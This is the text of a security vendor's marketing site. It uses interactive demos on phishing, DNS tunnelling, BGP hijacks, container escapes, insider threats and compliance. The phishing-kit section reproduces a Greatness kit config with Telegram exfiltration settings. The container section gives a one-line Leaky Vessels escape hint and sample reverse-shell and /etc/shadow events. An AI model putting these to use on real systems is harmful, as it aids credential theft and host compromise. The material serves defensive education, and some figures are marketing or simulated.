RE-AUTHENTICATE OKTA

Display:

https://twilio-okta.com/schedule

Actual:

https://twilio-okta.com/schedule?u=engineer@twilio.com

⚐ FORENSIC FINDINGS · 7 ARTIFACTS

AUTO-CYCLING

CLASSIFICATION

Credential Harvest — Spear Phishing

CONFIDENCE

/ 100

ACTOR

0ktapus / Scatter Spider (UNC3944)

KIT / TOOLING

0ktapus kit + Cloudflare-fronted relay

91%

of breaches start with phishing email

$2.9B

FBI IC3 BEC losses 2023

163

Twilio customers breached via 0ktapus

200d

average APT28 dwell time on NGOs

ZERO TRUST · BROKER FLOW

Implicit trust was the original sin.
Verify every request like it’s the first.

The corporate firewall stopped being a perimeter the moment your CFO opened a laptop in a coffee shop. A modern broker grades every single request — identity, device, network, cryptographic binding, policy attributes, just-in-time scope, continuous behavior — before any byte reaches a resource. Below: five real request profiles run through the gate.

ztna.broker · never trust · always verify · 7 layers

layer 0/7

SCENARIOS

request profiles

LAYERS

per request

CHECKS

evaluated

ALLOW

clean signal

DENY

hard block

incoming request

CFO · HQ laptop

principal ▸ cfo@acme.io · VP Finance · Okta user since 2019

source ▸ MacBook (Jamf managed) · 10.12.1.47 · HQ WiFi · 10:14 AM PT

target ▸ NetSuite financial reports · read-only

accumulated risk0 / 100

030 — stepup70 — deny100

Identity

Who is asking

Device posture

What are they on

Network context

Where from

Crypto binding

mTLS · JWT · audience

Policy engine

Attribute decision

Just-in-time auth

Ephemeral grant

Continuous monitor

Keep watching

evaluating layer— standby

Awaiting evaluation. Auto-play enabled, or click a layer card to inspect.

broker verdict

EVALUATING…

final risk score

/ 100

broker principles

· never trust

· always verify

· least privilege

· ephemeral grants

· continuous eval

· deny by default

verification layers per request

100%

of requests evaluated continuously

implicit trust by network location

<300ms

median broker decision latency

SUPPLY CHAIN · DEPENDENCY CASCADE

The enemy is already inside your dependency tree.
You installed them yourself.

Your build box pulled them in. Your CI pipeline signed them. Your auto-updater shipped them to production. Supply chain attacks don’t break the front door — they turn the people you already trust into attack vectors. Below: five real cascades, from a single upstream compromise to hundreds of thousands of victims.

18,000

SolarWinds customers trojaned

600K

3CX orgs running malicious installer

CVSS 10

XZ Utils — every Linux box at risk

29,000

Codecov CI pipelines leaking secrets

APT ATTRIBUTION · FUSION INTEL

It isn’t “hackers”.
It’s a military unit with your IP on a whiteboard.

Every major intrusion you read about ends in three letters and a country code. GRU. SVR. MSS. RGB. PLA. These are not basement kids — they are indicted state operators with blast radius, tradecraft, and objectives. The fusion feed below tracks six of them: Fancy Bear, Cozy Bear, Lazarus, APT41, Sandworm, and Volt Typhoon — with real dossiers, victimology, and indicators of compromise.

$1.5B

stolen by Lazarus from Bybit (Feb 2025)

18K

orgs hit by APT29's SolarWinds backdoor

$10B

global damage from Sandworm's NotPetya

of Eyes issued joint Volt Typhoon advisory

MITRE ATT&CK · INCIDENT REPLAY

The ransom note is the credits.
The movie is the seven days you missed.

By the time the wallpaper changes and the encryption is done, the attackers have already been inside for a week. They’ve dumped your credentials, mapped your domain, exfiltrated your billing database, and rehearsed the kill. Replay the killchain from five real incidents — Colonial Pipeline, Change Healthcare, NotPetya at Maersk, MGM Resorts, and the Kaseya supply-chain detonation that took 1,500 businesses dark in two hours.

replay.kc · DARKSIDE · STAGE 1/7

REPLAY LIVE

NOW REPLAYING

Colonial Pipeline

→ Colonial Pipeline Co.

sector: Energy / Fuel Logistics|date: May 7, 2021|duration: 6 days

RANSOM DEMAND

$4.4M

PAID

DWELL TIME

~7 days

before detonation

ATT&CK STAGES

mapped techniques

PROGRESS

14%

stage 1 of 7

MITRE ATT&CK KILLCHAIN · 6 days

INIT ACCESS · T+00:00

Dormant VPN account, no MFA

T1078.003 · Valid Accounts: Local Accounts

WHAT HAPPENED

A legacy VPN credential belonging to an inactive employee — reused from an unrelated third-party breach — was sold on a Russian darknet forum. DarkSide logged in cleanly, no alerts.

FORENSIC EVIDENCE

$ vpn-01: AUTH OK user="j.boyce" src=45.155.205.23 mfa=NONE

BLAST RADIUS

1 host / 0 alerts

THREAT ACTOR

DarkSide

Russian-speaking RaaS crew. Branded as 'ethical' — refused hospital/gov targets. Disbanded 8 days after this hit.

FINAL OUTCOME

5,500 mi pipeline halted · 45% of US East Coast fuel supply cut · EO 14028 issued · $2.3M recovered by DOJ via seed phrase.

RANSOM

$4.4M USD (75 BTC)

PAID

TACTICS

INIT ACCESS

EXECUTION

PERSIST

PRIV ESC

EVASION

CREDS

DISCOVERY

LATERAL

COLLECTION

EXFIL

IMPACT

$10B

global damage from NotPetya / Maersk

100M

patient records exposed at Change Healthcare

1,500

businesses encrypted in 2hrs via Kaseya

7 days

average dwell time before detonation

DNS ANALYTICS · SHANNON ENTROPY

Your firewall is watching port 80.
The data is leaving on port 53.

Every enterprise allows DNS outbound. That’s the deal. Attackers know it. OilRig tunneled commands through TXT records; FrameworkPOS exfiltrated 56 million credit cards via A record subdomain labels during the Home Depot breach. Cobalt Strike has shipped a DNS beacon as a default since 2012. Entropy is how you catch it.

sns-dns-ids · resolver tap · 10.0.0.0/8 · shannon-entropy

5 EXFIL

QPS

14.3K

queries per second

MALICIOUS

in current window

HIGH ENTROPY

≥ 5.5 bits / char

SUSPICIOUS

behaviour anomalies

filter

dns query stream · 15 visible

t+0s

MALICIOUS17:42:05.018TXT

aGVsbG8tYXBUMzQtb3BlcmF0b3I.0ffice36o.com

entropy

5.93 bits

label len

28 chars

source

10.42.5.9

BASE64_LIKEHIGH_ENTROPYTXT_QUERYKNOWN_C2

decoded payload

hello-apT34-operator

Beacon check-in to OilRig C2. TXT query is the tell.

campaign match

2018–2019

DNSpionage (OilRig / APT34)

Attributed to OilRig/APT34 (Iran) by Cisco Talos in November 2018. Operators compromised Lebanon’s Ministry of Finance, UAE Ministry of Justice and others. Malware resolved TXT records whose answers contained base64 commands; results were then exfiltrated in subdomain labels of outbound DNS queries. Also performed a broader DNS hijacking campaign against government domains during the same window.

detection signals

›base64-encoded subdomain labels (>30 chars)
›TXT record answers with base64 in rdata
›C2 resolvers rotated every 15 min

56M

cards stolen from Home Depot via DNS

4.2

entropy of english text (bits / char)

5.95

entropy of pure base64 random noise

40%+

of IR cases use Cobalt Strike DNS beacon

KIT FORENSICS · STATIC ANALYSIS

The phishing link is
the tip of a rented iceberg.

When an employee clicks, they hit software— a packaged kit rented from Telegram for $120 a month, with anti-bot middleware, Microsoft pixel clones, Telegram exfiltration, and an operator panel that relays MFA codes in real time. Here are four real ones Hayaiti has dissected.

sns-phish-lab · kit sandbox · static analysis

active

2022 · active

Greatness

Telegram PhaaS with prefilled victim email

brand

Microsoft 365

price

$120 / month

victims

~40,000 accounts

malicious files

2 c2 / exfil · 3 anti-bot

First disclosed by Cisco Talos in December 2022. Sold on Telegram for around $120/month with a real-time dashboard of harvested credentials. Kit pre-fills the victim’s email address from a phishing link parameter so the login page looks like “just re-enter your password”. Bypasses 2FA by relaying TOTP codes to attacker in near real time.

kit contents6 files

config.php2 KBC2

<?php
// Greatness kit — DO NOT SHARE
$TELEGRAM_TOKEN = "5678901234:AAFxJdK...Vh3N";
$CHAT_ID        = "-1001876543210";
$ADMIN_EMAIL    = "g.reatness@onionmail.org";
$REDIRECT_URL   = "https://login.microsoftonline.com/common/login";
$BLOCK_BOTS     = true;
$LOG_IP         = true;
$LOCALE_LOCK    = ["en","fr","de","nl","ja"];
$BLOCK_COUNTRY  = ["RU","BY","KZ","UA"]; // avoid own-region heat
?>

exfiltration targets

telegramBot token

5678901234:AAFxJdK...Vh3N

telegramChat ID

-1001876543210

emailFallback

g.reatness@onionmail.org

webhookC2

hxxp://grt-api[.]icu/in

attribution

Cisco Talos (Dec 2022) · Russian-speaking actor

flag legend

EXFIL

ANTI-BOT

LANDING

ASSETS

PANEL

56K

accounts compromised via W3LL OV6

$120

monthly rent for Greatness PhaaS

70K

16shop victims across 44 countries

AitM

bypasses every form of MFA

BGP MONITORING · RPKI-ROV

The internet runs on
trust nobody audits.

Border Gateway Protocol is how networks tell each other who owns which IP ranges. For 30 years it has been held together by honesty and email. One typo in Pakistan nuked YouTube globally. One Rostelecom update diverted Visa. One attack on Route 53 emptied ETH wallets. Here is how Hayaiti watches it.

sns-bgp-monitor · rpki-validator · 11 route collectors · 1.18M prefixes

3 ACTIVE

UPDATES / MIN

847K

global BGP churn

HIJACKS DETECTED

last 5 minutes

RPKI INVALID

ROA validation fails

AVG DURATION

42 MIN

until corrected

Route convergence for

52.85.132.0/22

hijacked via 52.85.132.0/24 (more-specific)

MORE-SPECIFIC LEAKRPKI INVALID

legitimate AS-PATH → AS16509 Amazon AWS

hijacked AS-PATH → AS209242 Unknown AS

Victim

AS16509 (US)

Amazon AWS

Attacker

AS209242 (??)

Unknown AS

Duration

ongoing · 00:04:18

1 prefix · more-specific /24

LIVE · 17:42 UTC

LIVE

ONGOING — MyPayPortal.com

Observed 4 minutes ago. A more-specific /24 is being announced from AS209242 inside Amazon’s own /22. RPKI ROA exists and this announcement fails ROA validation — but not every upstream enforces ROV. Propagation detected at 4 of 11 route collectors so far.

Traffic impact: Payment processor CDN traffic drifting

CODENAME · bgp-live

Historic hijacks

7 cases

bgpd \u00b7 live update stream

t+0s

-2sUPDATE8.8.8.0/24viaAS15169✓ ROA

AS-PATH 3356 15169

-5sUPDATE1.1.1.0/24viaAS13335✓ ROA

AS-PATH 174 13335

-11sHIJACK52.85.132.0/24viaAS209242✗ ROA

AS-PATH 209242 209242 209242

ORIGIN MISMATCH · ROA fails

-14sANNOUNCE140.82.112.0/20viaAS36459✓ ROA

AS-PATH 3356 36459

-18sUPDATE17.0.0.0/8viaAS714✓ ROA

AS-PATH 1299 714

-23sWITHDRAW208.65.153.0/25viaAS36561· · ·

RECOVERY /25 PULL

-27sUPDATE185.199.108.0/22viaAS54113✓ ROA

AS-PATH 3356 54113

-31sHIJACK208.65.152.0/24viaAS17557✗ ROA

AS-PATH 3491 17557 17557

MORE-SPECIFIC LEAK

-36sUPDATE157.240.0.0/17viaAS32934✓ ROA

AS-PATH 3356 32934

-42sHIJACK205.251.192.0/24viaAS10297✗ ROA

AS-PATH 10297 10297 10297

ROUTE 53 REPLAY

2,500

BGP hijacks detected per year

56 min

YouTube outage from a single /24

$152K

MyEtherWallet drained via Route 53

37K

prefixes leaked by China Telecom in 2010

K8S RUNTIME · eBPF SYSCALL TRACING

Your containers
are not walls. They’re suggestions.

Every year brings new container escape CVEs — Leaky Vessels (2024), Dirty Pipe (2022), runC (2019). The runtime is where attackers actually operate, and where most scanners stop looking. This is Hayaiti’s eBPF-based pod telemetry flagging suspicious syscalls, mounts, capabilities, and escape attempts in real time.

sns-k8s · falco-runtime · cluster: prod-us-east-1

eBPF probes active·v2.1

TOTAL PODS

CLEAN

SUSPICIOUS

COMPROMISED

kubectl get pods --all-namespaces

ns/payments-prod3 pods

ns/default2 pods

ns/kube-system2 pods

ns/dev-sandbox1 pods

POD DETAIL

curl-debug-pod

ns/default · curlimages/curl:8.5.0

COMPROMISED

RUNTIME EVENTS (3)

Host filesystem access (Leaky Vessels)

escapeCRITICAL

Process is reading /etc/shadow via /proc/self/fd — classic CVE-2024-21626 exploitation pattern.

Connection to 185.220.101.47:4444

networkCRITICAL

Outbound to known Sliver C2 IP (TOR exit node). Reverse shell probably established.

Unshare user namespace

privescHIGH

Process called unshare(CLONE_NEWUSER) — preparing for namespace escape.

CONTAINER ESCAPE CVES · KNOWLEDGE BASE

Leaky Vessels (runC)CVE-2024-21626 · 2024CVSS 8.6

runC process.cwd handling flaw lets a container reference a host file descriptor, enabling full host filesystem access from inside a container.

// WORKDIR /proc/self/fd/7 in Dockerfile lands the container shell in the host root namespace.

eBPF syscall tracing · Falco rules v0.37 · 6 known escape CVEs trackedsns-k8s runtime v2.1

major container escape CVEs tracked

8.6

highest CVSS (Leaky Vessels 2024)

eBPF

kernel-level telemetry, no agent

mean runtime event detection

UEBA · BEHAVIORAL ANALYTICS

The attacker
already has a badge.

Verizon’s 2024 DBIR attributes 34%of breaches to insiders — employees, contractors, and ex-employees whose credentials still work. The signal isn’t malware. It’s behavior. Click a user below to see how UEBA would have flagged real-world insider cases months before the exfil.

sns-ueba · user-risk-engine· ML-driven baselines

9 monitored users·90-day baseline

CRITICAL RISK

score ≥ 85

HIGH+

score ≥ 70

DEPARTING RISK

notice + elevated

MODELS

active behavior models

SORT:

USER · ROLE

BEHAVIOR (24h)

DELTA

RISK

Martin Tripp

Manufacturing Process Eng.

Operations · 3.2 yrs tenure

CRITICAL

normalwatchelevatedhighcritical

ANALYST NOTE

“Mass SCADA export + unusual email to journalists”

DETECTED ANOMALIES (4)

Bulk file download+22

Downloaded 4.2 GB from SharePoint in 17 minutes

Data exfil pattern+28

Gmail upload of ZIP larger than 50 MB (DLP flagged)

After-hours access+14

SharePoint crawl+16

Accessed 312 documents outside normal scope in 2h

HISTORICAL CASE · Tesla 2018

Tesla process engineer exfiltrated gigabytes of manufacturing data and sent it to Business Insider. Tesla filed suit June 20, 2018. The exfil was detected via internal audit after he was denied a promotion.

Verizon DBIR 2024: 34% of breachesinvolved insiders · avg dwell 85 dayssns-ueba v2.7 · 12 models · 90d baseline

34%

of breaches involve insiders (DBIR 24)

85 days

avg insider threat dwell time

$17.4M

avg cost per insider incident (Ponemon)

Hayaiti behavior models active

SOC OPS · 24/7 TRIAGE CONSOLE

The first 15 minutes
decide everything.

IBM’s 2025 Cost of a Data Breach report pegs the global average at $4.88M. The breaches contained in under 200 days cost $1.02M less. Speed matters. This is what Hayaiti analysts see at 3 a.m. on a Tuesday — live alerts flowing through a human triage queue, not a pile of SIEM noise.

sns-soc · live-triage · 24/7 operations

ANALYSTS ONLINE: 4/4·tick 0

OPEN INCIDENTS

P1 CRITICAL

MTTD · P1

3.2 min

AVG TTR · 24H

388m

FILTER:

01 · NEW

unreviewed alerts

02 · INVESTIGATING

analyst assigned

03 · CONTAINING

response in flight

04 · RESOLVED

closed · last 24h

P1 · CRITICALINC-4821 · Malware

Suspicious PowerShell encoded command

Base64 payload decoded to downloader targeting admin host.

MITRET1059.001 · PowerShell

SOURCEEDR

ASSETS AFFECTED3

ANALYSTunassigned

DETECTED2m ago

LANENEW

14 incidents tracked · median triage 4.1 min· P1 SLO 15 minsns-soc v4.2 · playbooks: 47

$4.88M

avg breach cost (IBM 2025)

258 days

industry mean time to contain

3.2 min

Hayaiti P1 mean time to detect

automated response playbooks

ENTROPY LAB · HIBP 14.3B CORPUS

Your password is not a secret.
It’s math.

Troy Hunt’s Have I Been Pwned catalogs 14.3 billionleaked credentials from 870+ breaches. Most passwords don’t need cracking — they need looking up. Type any password below to see how it fares against five real attack models. Nothing leaves your browser.

hashcat · crack-sim · demo mode

5 attack models

enter a password to test

try:

entropy · shannon bits72

025 poor40 weak60 good80 strong100+

overall verdict

GOOD

Holds up unless the attacker has unlimited resources.

time to crack · by attack model

Brute Force (CPU)

Single CPU, ~1M hash/s (slow hash)

74.9M yr

Dictionary Attack

10M common passwords + rules

instant

Rainbow Table

Precomputed MD5/SHA1 (no salt)

not viable

Leaked Database (HIBP)

14B credentials in the Troy Hunt archive

instant · in HIBP

GPU Farm (8x RTX 4090)

~800 GH/s against fast hashes (NTLM)

94 yr

character composition

length11

charset95

lower6

upper1

digit3

symbol1

leet substitutions detected

none found. Leet doesn't fool modern crackers anyway — hashcat has mangling rules for every substitution.

the math everyone ignores

Have I Been Pwned contains 14.3 billion breached credentials from 870+separate incidents. If your password has ever appeared in a breach (for any account, anywhere), it's in a cracker's dictionary right now. Password length beats complexity. Uniqueness beats everything. Use a manager.

14.3B

leaked credentials (HIBP)

81%

of breaches use stolen passwords

<1 sec

to crack any top-10k password

800 GH/s

modern GPU farm hash rate

Software Supply Chain · CycloneDX SBOM

You installed 12 packages. You shipped 1,186.

Log4Shell lived in a logging library. The xz-utils backdoor lived in an archive tool. Polyfill.io lived in a CDN you forgot you used. Every modern application is a matryoshka of other people's code, and attackers have figured out that hijacking the well is cheaper than poisoning every cup. Here's what's actually in your node_modules.

sbom.acme-saas@2.14.0 · cyclonedx v1.6

17nodes · 1,247 transitive paths

risk lens:

dependency risk distribution · Known vulnerabilities (NVD/GHSA)17 packages

SAFE7

WATCH2

WARN3

CRITICAL5

dependency tree

… and 1,174 more transitive dependencies not shown

selected package

log4j-core

@2.14.1

maventransitive· 47 paths

cve

CRITICAL

license

SAFE

maintain

SAFE

typosquat

SAFE

the incident · 2021

Log4Shell · CVE-2021-44228 · CVSS 10.0

A JNDI lookup in a logging library. One string in a User-Agent. Worldwide RCE. Cost businesses over $100B in remediation. Found in 93% of enterprise cloud environments within 48 hours of disclosure.

direct deps

transitive

1,174

critical advisories

max attack surface

CRITICAL

Cloud Posture · AWS / Azure / GCP

The cloud doesn't get breached. Your config does.

Capital One. Accenture. Uber. Imperva. Every headline-grade cloud breach started with a misconfiguration a scanner would have caught in seconds. Public buckets, wildcard IAM, disabled logging, stale keys. Run the scan. Watch the findings stream in. Each one points to a real company that paid the price.

cspm.sns / cloud-posture-scan · session_id: 7f3c

services scanned0%

Object Storage

EC2

Compute

IAM

Identity

RDS

Databases

Functions

Audit Logs

KMS

Encryption

VPC

Networking

findings stream

{ }

scan not started

Click RUN to sweep 8 services across a simulated AWS account

awaiting scan results

Selected findings will show the real-world breach they map to, along with the one-line fix.

Adversary Playbook · TA0001-TA0040

Attackers don't need creativity. Just this matrix.

Every public breach, from Colonial Pipeline to Change Healthcare, traces back to a handful of techniques on MITRE ATT&CK. Twenty-six moves. Thirteen years of history. The adversary has a playbook. If you don't know which pages they're reading, you're defending everything and protecting nothing.

mitre-att&ck/enterprise-matrix · rev 14.1

25 techniques · 14 tactics

vertical:

>1,847 public breaches in 2024

TA0043

Recon

1 tech

TA0042

Resource

1 tech

TA0001

Initial

4 tech

TA0002

Exec

2 tech

TA0003

Persist

2 tech

TA0004

PrivEsc

1 tech

TA0005

Evasion

2 tech

TA0006

Creds

2 tech

TA0007

Discover

1 tech

TA0008

Lateral

1 tech

TA0009

Collect

1 tech

TA0011

2 tech

TA0010

Exfil

2 tech

TA0040

Impact

3 tech

heat:

<45%

45-55%

55-65%

65-75%

75-85%

>85%

TA0001 · Initial Access

T1566

Phishing

observed in

92%

of all breaches

real-world incidents · redacted press

2021

Colonial Pipeline

Compromised VPN credential reuse after phishing

2022

Activision

SMS phishing led to source code theft

2022

Uber

MFA fatigue + Slack pivot

detection guidance

›DMARC/DKIM/SPF enforcement
›Inbox rule monitoring
›Suspicious attachment sandboxing
›URL rewriting and detonation

sns coverage

◼ covered

Email posture scan + DMARC audit + user awareness rollouts

the 80/20 rule

Five techniques account for the majority of intrusions in all sectors. Defend these first.

source

DBIR 2024 · M-Trends 2024 · CrowdStrike OverWatch · CISA KEV cross-ref

The 80/20 reality

5 / 196

Just 5 of MITRE's 196 enterprise techniques account for ~78% of observed intrusions.

Median dwell

10 days

M-Trends 2024 · down from 16 in 2022, but initial access is faster than ever.

Ransomware ready in

5.5 hrs

Fastest observed breakout time · CrowdStrike 2024 Global Threat Report.

Compliance · Ten frameworks, one scan

Your auditor’s favourite appendix.

Every finding Hayaiti surfaces is pre-mapped to the controls your auditor is going to ask about. No more spreadsheet crosswalks at 11pm the night before fieldwork.

SOC 2

Type I & II

64 controls

ISO 27001

Annex A

93 controls

NIST CSF

2.0 Functions

106 subcategories

PCI DSS

v4.0

12 requirements

HIPAA

Security Rule

54 safeguards

GDPR

Art. 32 & 33

7 principles

CCPA

CPRA 2023

8 consumer rights

CIS v8

Critical Controls

18 controls

FedRAMP

Moderate

325 baseline

NYDFS 500

Cybersecurity Rule

23 sections

Evidence Pack · Auto-generated

One download. Twelve audit binders.

Every scan produces a controls matrix, gap analysis, remediation log, and timestamped evidence artifacts. We ship it as a single zip your GRC team can drop straight into Vanta, Drata, or Tugboat.

710+

Controls
mapped

47s

Avg. evidence
export time

Auditor
complaints

Trust Center · All systems nominal

We publish what others hide.

Uptime, incidents, subprocessors, data residency, open source licenses, and the exact content of every audit we’ve ever passed. Updated continuously. No NDAs required.

Uptime (90d)

99.994%

SLA: 99.9%

Incidents (12mo)

Last: 847 days ago

Mean response

87ms

p99: 312ms

Subprocessors

All SOC 2 Type II

Status Board

90-day uptime

Operational

Scanning API

99.994%

Dashboard

99.998%

Webhooks

99.990%

PDF Exports

99.910%

Evidence Pack Builder

99.985%

Operational

Degraded

Outage

Last updated: 11 sec ago

Subprocessors

7 vetted partners

AWS

Infrastructure · us-east-1, eu-west-1

Cloudflare

DDoS / WAF · Global

Stripe

Billing · USA

PostgreSQL RDS

Database · us-east-1

Datadog

Observability · USA

View all 7 →

Data Residency

Your data, your continent

Virginia / Oregon

64%

Ireland / Frankfurt

29%

London

Montreal

Cross-border transfers happen only with explicit SCCs. GDPR Art. 46 compliant.

Downloadable artifacts

Pull the receipts. They’re all here.

SOC 2 Type II ISO 27001 HIPAA Attestation Pentest Report Incident History DPA Template

Integrations · 40+ tools

Plugs into your stack in 4 minutes flat.

No rip-and-replace. Hayaiti streams findings into the tools your team already lives in — Slack, Jira, GitHub, Datadog, and 36 more. Hover any tool to see exactly what we do with it.

Native

AWS

Cloud

Pulls IAM, S3, RDS, EC2, VPC configs hourly. Flags public buckets + over-privileged roles.

Native

Google Cloud

Cloud

Scans GKE clusters, Cloud Storage, IAM bindings. Tracks service account key age.

Native

Azure

Cloud

Reads Defender posture, AAD roles, Blob Storage ACLs, Key Vault access policies.

OAuth

Cloudflare

Cloud

Audits WAF rules, Zero Trust posture, DNS records, R2 buckets, and API tokens.

API

DigitalOcean

Cloud

Inventories droplets, Spaces, firewall rules, and Kubernetes cluster configs.

API

Fly.io

Cloud

Pulls app inventory, secrets metadata, and region deployment topology.

OAuth

Vercel

Cloud

Scans deployed projects for exposed env vars, auth config, and leaked preview URLs.

Native

Okta

Identity

Watches for stale accounts, MFA drift, admin-role creep, and risky sign-in patterns.

OAuth

Auth0

Identity

Audits tenants, connections, rules, and brute-force policies.

API

1Password

Identity

Flags shared credentials, weak vault items, and reused passwords across the team.

OAuth

Google Workspace

Identity

Monitors super-admin count, inactive users, OAuth grants, and 2SV enrollment.

Native

Microsoft 365

Identity

Reads Conditional Access, MFA coverage, and risky OAuth consent grants.

API

Duo

Identity

Correlates failed MFA attempts with sign-in anomalies to catch push-bombing attacks.

Webhook

Datadog

SIEM

Streams findings into a dedicated dashboard. Fires alerts on new criticals.

Webhook

Splunk

SIEM

Forwards every scan as a structured event. Pre-built dashboards included.

Webhook

Sumo Logic

SIEM

Ingests findings via HTTP Source. Auto-correlates with your access logs.

API

New Relic

SIEM

Emits custom events so you can alert on MTTR regressions by team.

API

Grafana

SIEM

Read-only Postgres datasource for your own dashboards and Grafana alerts.

Webhook

PagerDuty

SIEM

Pages the right on-call whenever a Critical is confirmed during business hours.

Native

GitHub

Code

Opens issues with reproduction steps, suggested patches, and links to the offending line.

Native

GitLab

Code

Creates MRs with fix branches for high-confidence automatable findings.

OAuth

Bitbucket

Code

Files issues and comments on pull requests when a new PR introduces known risky patterns.

Native

Jira

Code

Auto-creates tickets in the project and team of your choice. Closes them on re-scan pass.

Native

Linear

Code

Files issues with priority mapped to finding severity. Attaches evidence as comments.

API

Asana

Code

Pushes findings into a dedicated Asana project with sub-tasks for each fix step.

Native

Slack

Chat

Posts findings to the channel of your choice. Threaded replies for triage and resolution.

Native

Microsoft Teams

Chat

Adaptive cards with severity, affected asset, suggested fix, and one-click acknowledge.

Webhook

Discord

Chat

Webhooks into a private channel with role pings for critical severity.

API

CrowdStrike

EDR

Correlates endpoint telemetry with our findings to prioritize exploitable assets.

API

SentinelOne

EDR

Pulls agent health + detections to surface unprotected hosts.

API

Huntress

EDR

Shares incident context so Hayaiti can confirm if a finding was actively exploited.

API

Defender

EDR

Ingests Defender alerts for full asset posture coverage including Office 365.

Native

Vanta

Compliance

Maps every Hayaiti finding to your live Vanta controls. Auto-updates evidence.

Native

Drata

Compliance

Pushes scan artifacts straight into Drata’s evidence library with control tags.

API

Tugboat Logic

Compliance

Keeps controls continuously green as Hayaiti verifies them weekly.

API

Secureframe

Compliance

Emits signed evidence bundles for every SOC 2 control Hayaiti touches.

API

WordPress

SaaS

Scans plugin inventory, admin accounts, XML-RPC exposure, and file-edit capability.

OAuth

Shopify

SaaS

Audits custom app scopes, staff accounts, and webhook secret rotation.

OAuth

Salesforce

SaaS

Flags over-privileged profiles, outdated Apex, and unused connected apps.

OAuth

HubSpot

SaaS

Checks private app tokens, super-admin sprawl, and exposed custom object APIs.

API

Stripe

SaaS

Monitors restricted key scopes, team role hygiene, and webhook signature verification.

Missing your tool?

We ship new integrations in 48 hours on average. Tell us what you use and we'll wire it up before your next scan.

Request integration

From the Research Lab

Threat intel, the moment it breaks.

Our research team publishes deep-dives on active CVEs, ransomware crews, and SMB-specific attack patterns — the same intel that powers our scanner.

CRITICAL

CVE-2026-21985: Critical RCE in Apache Struts — What You Need to Know

A critical remote code execution vulnerability has been discovered in Apache Struts affecting versions 2.5.0 through 6.4.0. Immediate patching is recommended.

April 4, 2026Read more →

THREAT REPORT

Q1 2026 Ransomware Threat Landscape: 340% Increase in Double Extortion

Our quarterly analysis reveals a dramatic surge in double-extortion ransomware tactics targeting mid-market businesses with revenues under $500M.

April 1, 2026Read more →

GUIDE

The Complete DMARC Implementation Guide for 2026

Step-by-step instructions to configure SPF, DKIM, and DMARC for your domain. Prevent email spoofing and improve deliverability in under an hour.

March 28, 2026Read more →

View All Research →

Free Resources

The same playbooks our analysts use.

No email gates. No drip sequence. Download whatever you need — these are the actual templates and reports that ship with the product.

REPORT 2026

REPORT

2026 SMB Threat Landscape

98% of small businesses had at least one critical exposure in 2025. The data, the patterns, and what changed.

NIST CSF Implementation Guide

Step-by-step controls for the 23 NIST CSF v2.0 outcomes. Includes evidence templates and a prebuilt audit log.

Incident Response Playbook

First 60 minutes of a real ransomware incident — exactly what to do, who to call, and what NOT to touch.

54 pages·5.1 MB

Download

Browse all 28 free resources

FAQ

The questions every CISO asks first.

Don’t see your question? Our security team replies to every inbound message in under 4 business hours.

Talk to a security engineer

Is the scan legal? Do I need to notify my hosting provider?

Yes, fully legal. Our scans are non-intrusive — we only test publicly accessible attack surfaces, the same way an attacker would observe your domain from the internet. The email-based authorization handshake creates a documented consent record. No need to notify hosting providers, but we always recommend looping in your security team.

How is Hayaiti different from a Nessus scan or other free tools?

Nessus and similar tools are vulnerability scanners — they require installation, expertise to interpret results, and produce thousands of false positives. Hayaiti is a managed service: zero install, results triaged by security analysts, and mapped to compliance frameworks. We provide outcomes, not raw data dumps.

How long does a typical scan take?

Most scans complete in 12 — 18 minutes for a domain with up to 200 subdomains. Larger surface areas (1,000+ assets) may take up to an hour. You'll get a notification email when the report is ready, plus your dashboard updates in real time.

Will Hayaiti slow down or break my website?

No. We use a low-rate, non-credentialed scan profile that mimics normal traffic. Most websites see no measurable impact. We respect robots.txt for non-security-critical paths and never run brute-force or denial-of-service tests.

Can I scan a domain I don't own?

No. We require a valid email matching the domain you want to scan. This prevents misuse and protects both parties. If you're a reseller or MSP managing multiple client domains, contact us for a partner program with delegated authorization.

What's the typical contract length and cancellation policy?

Plans are month-to-month with no long-term commitment. Annual pre-pay gets a 15% discount. Cancel anytime with 30 days notice. You retain all scan history and reports for 90 days post-cancellation.

Compliance & Audits

Auditors stop asking questions when they see this report.

Every scan maps findings to the controls your auditor cares about. Walk into your next SOC 2, ISO, or HIPAA review with the evidence pre-packaged.

SOC 2

Type II

64 controls

ISO 27001

Information Security

114 controls

HIPAA

Healthcare

Privacy + Security

PCI DSS

Payment Cards

v4.0

GDPR

EU Privacy

Article 32

NIST CSF

Cybersecurity

v2.0

Reports accepted by

CoalfireSchellmanA-LIGNBARR AdvisoryPrescient Assurance

All systems operational·99.97% uptime|

SOC 2 Type II audited

End-to-end encrypted

Last incident: 247 days ago

Changelog · Shipped this quarter

We ship every Thursday.

Here's what landed in the last 60 days — every detection, every integration, every platform improvement. Filter by category or just scroll the whole thing.

Apr 04

2026

v4.19.0•DetectionNew

CVE-2026-1847 detection shipped within 3 hours of NVD publication

Coverage for the new Apache Tomcat deserialization RCE is live across all scanners. 412 vulnerable hosts flagged in the first scan cycle.

Apr 01

v4.18.2•Integrations

1Password SCIM integration goes GA

Audit shared vaults, detect reused credentials, and flag inactive users. SOC 2 evidence auto-attached for CC6.1.

Mar 27

v4.18.0•Platform

Scan execution engine rewrite — 3.4x faster

Median scan time dropped from 14 minutes to 4. The new engine parallelizes cloud inventory, code scanning, and identity checks concurrently instead of sequentially.

Mar 22

v4.17.3•UI

Keyboard shortcuts for triage queue

`J` / `K` to walk findings, `A` to acknowledge, `D` to defer, `R` to re-scan. Built after we watched 8 customers live-triage a week of findings.

Mar 18

v4.17.0•Detection

Detection pack: supply-chain typosquatting

Flags typosquatted dependencies across npm, PyPI, RubyGems, Maven, and crates.io. Cross-references known malicious packages from 6 intel feeds.

Mar 14

v4.16.1•Security

TLS 1.3 enforced on all customer data paths

Deprecated TLS 1.2 sunset complete. All traffic between Hayaiti control plane and customer tenants now requires TLS 1.3 with PFS cipher suites.

Mar 09

v4.16.0•Integrations

GitHub Actions remediation bot

Hayaiti can now auto-open PRs with suggested fixes for 47 common finding types. Each PR includes rollback steps and pre-merge validation.

Mar 03

v4.15.2•Platform

SOC 2 Type II report published

9-month observation period complete with zero findings. Report available in the Trust Center without an NDA.

Feb 26

v4.15.0•Detection

LLM prompt injection scanner

Scans customer-facing AI features for prompt injection vulnerabilities. Covers 14 attack classes from the OWASP LLM Top 10.

Feb 21

v4.14.4•UI

New asset graph visualization

Browse your attack surface as an interactive graph. Drill from cloud account → subnet → host → exposed port → finding with one click.

Feb 13

v4.14.0•Integrations

Cloudflare Zero Trust bi-directional sync

